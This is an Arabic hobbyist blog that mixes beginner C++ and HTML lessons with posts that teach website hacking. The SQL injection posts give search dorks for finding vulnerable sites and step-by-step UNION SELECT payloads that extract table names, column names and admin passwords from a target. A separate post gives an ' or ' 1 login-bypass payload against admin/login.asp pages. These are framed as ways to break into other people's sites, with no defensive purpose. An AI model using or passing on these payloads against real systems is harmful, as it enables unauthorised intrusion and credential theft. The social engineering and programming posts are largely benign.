Friday, February 20, 2015

مقدمة لدورة C Plus Plus

C Plus Plus
C++

جميعا يدرك بوجود العديد من لغات البرمجة. والكثير منا يواجه صعوبة في الوصول الى دورات كاملة لتعلم لغة برمجية معينة. لهذا السبب, أحب أن أقدم لكم دورة خاصة عن "السي بلس بلس". بإمكانك متابعة الدورة من خلال الإشتراك بالقناة و  متابعة المدونة. هذه الدورة ستكون مخصصة للمبتدئين وستكون مؤلفة من عشر دروس عملية, و عشر دروس نظرية. الشروحات العملية ستكون على اليوتيوب, و الشروحات النظرية ستوجد على المدونة.

البرامج
جميع البرامج مؤلفة من بيانات و تعليمات. 

Program = Data + Instruction

البيانات ولها انواع عديدة, ولكن في هذه الدورة سيتم التركيز على الأنواع التالية. 
integer
float
double
char
string



التعلميات: وهي اوامر المبرمج للحاسوب, او إخبار الحاسوب بالمهام التي تريد فعلها. ولكن تذكر بأن الحاسوب هو جهاز قادر على الحفظ و أتباع التعليمات بدقة شديدة. لذلك يجب عليك ادخال جميع التعلميات أو الأموار بدقة حتى يستطيع الحاسوب فهمها وتحويلها الى لغة الحاسوب. 

كل ما ذكر سابقا ينطبق على جميع لغات البرمجة. لذلك هذه المعلومات هي معلومات عامة عن جميع لغات البرمجة. والأن سأنتقل الى الـ سي بلس بلس

ما هي السي بلس بلس؟ هي نفس لغة سي ولكنها مطورة أكثر. إضافة الى ذلك جميع أكواد السي  تعمل على السي بلس بلس ولكن العكس غير صحيح. وذلك لوجود أدوات مميزة في السي بلس بلس يجعلها مميزة و متطورة أكثر من لغة سي

السي بلس بلس تحتوي على الكثير من الأسماء التي يجب حفظها. إضافة الى الكثير من الرموز الهامة. أهم هذه الرموز

Symbols
;
,
[]
// 
*/
!=
=
==
<=
>=
++
+=
أهم هذه الأسماء
Keywords/Reserved Words

if
while
int
float
double
for
do while

الى هناك أكون قد انتهيت من المقدمة. واترككم مع الشرح العملي. اذا لديك سؤال عن هذا الدرس لا تترد بطرحه, وساحاول
 الإجابة عليه إن أستطعت



Thursday, September 26, 2013

SQL INJECTION الجزء الثاني

SQL INJECTION 
الجزء الثاني 




السلام عليكم ورحمة الله وبركاته في التدوينة السابقة قمت بشرح حول هذه الثغرة كما سجلت مقطع فيديو كي أوضح لك الشرح. والان وبعون لله تعالى تم شرح الجزء الثاني وهو مقسم الى قسمين قسم مصور و قسم التدوينة 
القسم المموجود في التدوينة ما هو ألا شرح مبسط إضافة الى الأوامر المستخدمة في الشرح.  نبدأ على بركة لله تعالى

قد تعلمنا في التدوينة السابقة كيفية أستخراج اسم القاعدة والان ما علينا سوى الذهاب وتشفير اسم القاعدة لأستخدامها
في الأوامر المراد اتخاذها في سبيل اختراق الموقع
لنفرض ان اسم القاعدة هو 
Database Name: MacBook3arabi
ما عليك سوى نسخ اسم القاعدة والذهاب الى مواقع التشفير (رابط المواقع موجود أسفل المدونة)  وبهذا تتم عملية التشفير
والأن ننتقل الى الأمر لأستخراج اسم الجدول من اسم القاعدة 
لنفرض ان رابط الموقع المستهدف هو 
www.victimsite.com/index.php?macbook3arabiId=30
وكان عدد الأعمدة عشرة والأعمدة المصابة هي أثنان و ثلاثة و خمسة 
والأن ما علي سوى حذف إحدة الاعمدة الماصبة ولتكن اثنان وكتابة
concat(table_name)
وفي نهاية الرابط نكتب 
from information_schema.tables where table_schema=0x6772776f726b5f6772776f726b666f726365
0x6772776f726b5f6772776f726b666f726365 اسم القاعدة المشفر 
فيصبح الرابط كالتالي
www.victimsite.com/index.php?macbook3arabiId=-30 union select 1,concat(table_name),3,4,5from information_schema.tables where tables_schema= 0x6772776f726b5f6772776f726b666f726365--

ولنفرض ان اسم الجدول الموجود هو 
Omar 

والان نحتاج الى استخراج اسماء الاعمدة من اسم الجدول 
Omar
اولا يجب علينا تشفير اسم الجدول باستخدام نفس الموقع (رابط الموقع موجود اسفل التدوينة)  ثم
نضع بدل العمود المصاب الأمر التالي
group_concat(column_name)
وفي نهاية الرابط
from information_schema.columns where table_name=0x63617465676f7279
--
0x63617465676f7279 اسم الجدول المشفر
فيصبح الرابط 
http://victimesite.com/index.php?macbook3arabiId=-30 union select 1,group_concat(column_name)2,3,4,5
from information_schema.columns where table_name=0x63617465676f7279
--

 والان يظهر لدينا اسماء الاعمدة الموجودة في الجدول 
والان نختار اسم العمود المراد استخراج المعلومات منه ولنفرض اسم العمود هو 
Password 

وكتابة بعد الأمر بدل من اسم العمود المصاب
concat(password)
وفي نهاية الرابط
from omar--
منغير تشفير

victimsite.com/index.php?maccbok3arabiId=-30 union select 1,concat(password),3,4,5from omar--

والان تظهر لك الباسورد ثم تأخذ عمود اخر ولنفرض 
User 
وتسبدله بمكان الباسورد فيظهر لك اسم اليوزر 

وبهذا تتوصل الى المعلومات بالنسبة للوصول الى لوحة التحكم فما عليك سوى البحث في محركات البحث مع استخدام جمل
victimsite.com/login.php
وغيرها حتى تصل الى لوحة التحكم وتدخل بينانات ثم تتم الاختراق بإذن لله تعالى 

رابط الموقع التشفير

مشاهدة الجزء الأول مصور 


مشاهدة الجزء الثاني مصور
https://www.youtube.com/watch?v=q6EWRUsy0RU





Sunday, September 8, 2013

SQL INJECTION

SQL INJECTION 

How to Hack a website using SQL INJECTION method?


هذه التدوينة هي الجزء الأول من الدرس الكامل الذي يتكلم حول ثغرة السكل انجيكشن. ستتكلم الدوينة على جميع ما ذكر في الفيديو ولكن بشئ مختصر 

الـ دورك الثغرة : هناك العديد من الدوارك ولكن سأعطيك ثلاث دوارك شغالة بإذن لله ما عليك سوى وضعها في محركات البحث 
الدوارك هي
  • inurl:index.php?id=
  • inurl:gallery.php?id=
  • inurl:article.php?id=
  • inurl:pageid=

 انسخ الدورك وضعه في محرك البحث لتحصل على المواقع المصابة بهذه الثغرة 

فحص الثغرة: كيف تتعرف على ان المواقع مصاب بالثغرة ام لاء؟ 
الفحص بسيط ما عليك سو إضافة إشارة بسيطة واذا واجهت خطأ فإذن الموقع مصاب بالثغرة 
"
انا استخدم الإشارة الأولى ولكن بعض الاحيان استخدم الثاني للتأكد من وجود الثغرة 
الخطأ غالبا يظهر كهذا  

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

قد تختلف من موقع الى اخر ولكن المعنى واحد 

الوصول الى عدد الأعمدة: للوصول الى الأعمدة اتبع الأمر التالي 

www.victimsite.com/index.php/id?=2 ORDER BY N

طبعا الجزء المكبر هو الأمر ام الباقي فهو الرابط المواقع المصاب بالغرة 

للوصول الى العدد بسرعة شاهد الفيديو الموجود اسفل التدوينة 

عدد الأعمدة المصاب:معرفة عدد الأعمدة المصابة 
لنفرض كان عدد الاعمدة الموجودة في الموقع المصاب بالثغرة هو ١٣ 

ما عليك سوى كتابة 

www.victimsite.com/index.php/id?=2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13--

وستظهر لك عدد الأعمدة المصابة 

انتهى الشرح لمشاهدة الفيديو اضغط على المربع الموجود اسفل التدوينة 

https://www.youtube.com/watch?v=oX3261r1bBQ&feature=youtu.be

Monday, September 2, 2013

Social Engineering

الهندسة الإجتماعية Social Engineering 


كي نتعلم كيفية استخدام الهندسة الإجتماعية يجب علينا تعلم مفهوم الهندسة الإجتماعية هذه التدونية ملحقة بالفيديو الذي يدور حول الهندسة الإجتماعية وكيفية الأختراق  بأساليب مختلفة.
الهندسة الإجتماعية: هي دراسة النفسية للضحية بحيث تمكن المخترق من جمع اكبر عدد من المعلومات حول الضحية مما تساعده في اختراقه والوصول الى بياناته. 

أساليب الهندسة الإجتماعية متركزة على ثلاث مراحل
الأولى جمع معلومات عن الضحية
الثانية تحليل المعلومات ودراستها
والاخيرة إيجاد الثغرات الموجودة في الضحية 

قد تختلف اسلوب الهندسة الإجتماعية من شخص الى اخر وهذا يعود الى طبيعة الضحية وخبراته حول هذه المادة 

أساليب شائعة
بعض الاساليب الشائعة في عصرنا الحالي هي
برامج وهمية كمثال اختراق الفيس بوك والخ... او الأجهزة 
FaceBook Account Hacker is FAKE 100%
رسائل تنص بجوائز عالية القيمة مئة دولار او ما شابه
مواقع وهمية بهدف الدخول إليها والتحميل منها

هذه اكثر الأساليب الشائعة في عصرنا الحالي او في العالم العربي

الحماية من الاختراق النفسي وتطوير مهاراتك في الهندسة الإجتماعية
لتطوير نفسك عليك بقرأءة بعض القصص حول المخترقين و قراءة بعض المقالات التي تناقش الهندسة الإجتماعية ولكن ملاحظة لا تعتمد على مصدر واحد أقرأ من اكثر من مصدر وناقش المعلومات وحللها
لا تثق بأحد على الانترنت دون السؤال عنه و عمل بحث حوله
حاول ان تتمع بالغموض لا تنشر كل معلوماتك على الانترنت

 وهنا يكون قد انتهى المقال

للتواصل
Macbook3arabi@hotmail.com

Thursday, August 8, 2013

أختراق المواقع عن طريق ثغرة الـ Bypass

Bypass ثغرة الـ
Macbook3arabi


واحببت ان اقدم لكم الدرس الاول MacBook 3arabi السلام عليكم ورحمة الله وبركاته احببت اقول لكم عيد مبارك من 
في طرق أستغلال الثغرات. قد شرحت سابقا عن معنى الثغرة اتمنى مشاهدات المقالات االسابقة الخاصة بالثغرات والاختراق قبل قراءة هذا الموضوع
Bypass ثغرة الـ
هي ثغرة مصاب بها العديد من المواقع لمعرفة الموقع المصاب عليك كتابة هذا الدورك

admin/login.asp

 و في محركات البحث ومشاهدة المواقع
فإذا وجدت الموقع المستهدف من هذه المواقع فعلم انه مصاب بنسبة ١٠٠٪ الثغرة قديمة لذلك من النادر ان تجد موقع جديد مصاب بهذه الثغرة البسيطة 

أستغلال الثغرة: ربما تسأل ولكن كيف اخترق الموقع عن طريق هذه الثغرة (الخطأ الأمني) سنجيب على هذا السؤال  ؟؟؟؟؟
 Admin  كلمة USERNAME   اولا تقوم بكتابة في خانة الـ 
      PASSWORD ثانيا تقوم بكتابة في خانة الـ 

' or ' 1

والان تم الاختراق وبإمكانك الان عمل ما تريد 

Contact Info:

Macbook3arabi@hotmail.com

http://www.Twitter.com/macbook3arabi 

http://www.youtube.com/macbook3rabi

http://www.facebook.com/macbook3arabi

http://www.macbook3arabi.blogspot.com/

Saturday, August 3, 2013

الدرس الأول من الـ HTML

The First Lesson Macbook3arabi


السلام عليكم ورحمة الله وبركاته والان بعد ان قدمت لكم مقدمة حول هذه اللغة اتطرق الان معكم الى الدرس الأول وهو درس مهم ومن دون فهم هذا الدرس واستيعاب الأوامر المستخدمة لن تستطيع إكمال باقي الدروس الذي ستطرح إن شاء الله في هذه المدونة. نبدأ على بركة لله

عليك الأن فهم هذه الأوامر جيدا

كما تلاحظ الأوامر بسيطة جدا ودعنا نبدأ بشرحها واحدة واحدة وكما قلت في بداية الدرس هذه الاساسيات ومن دونها لا تتمكن من ان تكمل باقي الدورة

  1.  لن يستطيع المتصفح عرض اي شئ html  هذا تقوم بكتابته لإن من دون كتابته وحفظ المفكرة بصيغة <HTML>
  2.  هذا بمعنى رأس الصفحة وذلك لتسمية رأس الصفحة <HEAD>
  3.  وهو المقصود به عنوان راس الصفحة <HEAD> العنوان وهو يكتب مباشرة بعد الـ <TITLE>
  4.  هذا ما تريد كتابته في باقي الصفحة<BODY>
 </title></head></body></html>ربما تسأل نفسك ولكن لماذا 
هذه الأوامر لقفل الامر اي انا استخدمت الامر عنوان راس الصفحة وانتهيت من راس الصفحة فيجب علي قفلها ثم أبدأ في أمر جديد فلو نسيت قفل الاوامر ثم قمت بكتابة اوامر جديدة دون قفل السابقة لن يظهر لك شئ لإنه لن يستطيع فهم اي    
 (/) امر يجب عليه تنفيذه لذلك من الضروري قفل كل امر وطبعا الاختلاف ما بين المفتاح و القفل
إليك هذا المثال المصور 
   
انتهى الشرح 

ملاحظة: بعد كل ثلاث دروس يتم شرح مصور لجميع الدروس على قناة
http://www.youtube.com/macbook3arbi
 

Friday, August 2, 2013

HyperText Markup Language

hypertext markup language

<Html>
السلام عليكم ورحمة الله وبركاته قد تسأل نفسك ما الفائدة من تعلم هذه اللغة. الكثير من زوار هذه المدونة يبحثون عن المواضيع التي تختص في مجال الأختراق ولكن اخي الكريم اختي الكريمة دون تعلم هذه اللغات الموجودة في القائمة 
أسفل لا يمكنك ان تصبح مخترق محترف.  إليك هذه اللغات التي يجب عليك ان تكون متمكنن منها 
1. HTML
2. PHP
3. C++
طبعا هناك العديد من اللغات التي تفيدك في مجال الكمبيوتر ولكن سأبدأ انا في هذه اللغة التي ذكرنا اسمها في العنوان  HTML ألا وهي 

الترجمة: هذه اللغة هي اللغة لصنع صفحات الانترنت و معلومات اخرى يمكن ظهروها على المتصفحات الانترنت
اذن من خلال هذا التعريف تبين لنا ان اي صفحة على الانترنت مصنوعة من هذه اللغة طبعا لمشاهدة اي مثال بإمكانك
 View Page Source ثم الضغط على Google Chrome or Firefox الذهاب الى اي صفحة انترنت باستخدام
طبعا ستظهر لك أكواد لن تفهم منها شئ ولكن بعد استمرارك في هذه اللغة ستسطيع فهم هذه الاكواد وتشكيل صفحة بنفسك . وسنبدأ في الخطوات الاولى التي ستكون طريقك في هذه الدورة
  1. اتمنى منك اخي الكريم ان تكن لغتك الانجليزية جيدا 
  2. اتمنى ممارسة اللغة البرمجية يوميا كي لا تنساها
  3. اتمنى منك قراءة الكتب سواء كانت عربية ام غربية عن هذه اللغة مما تفيدك في التعلم بسرعة
الادوات المحتاجة: لمستخدمي الوندوز ما عليك سوا استخدام الـمفكرة وبالنسبة لمستخدمي الماك بوك اتمنى منكم تحميل   
لا داعي للقلق عن نوع المفكرة ما ذكرته يكفي ولكن هناك اداة ليست موجودة في الحاسوب TextWrangler
هذه الاداة موجودة في داخلك وهي الإرداة النفسية قد تواجد بعض الصعوبات اثناء الدورة نظرا للتقصير منا لذلك اتمنى منك الصبر وقراءة التدوينة في حال عدم فهم الدرس 

نلقاكم في الدرس الأول إن شاء الله 

Contact Us:
Macbook3arabi@hotmail.com
http://www.Twitter.com/macbook3arabi 
http://www.youtube.com/macbook3rabi
http://www.facebook.com/macbook3arabi
http://www.macbook3arabi.blogspot.com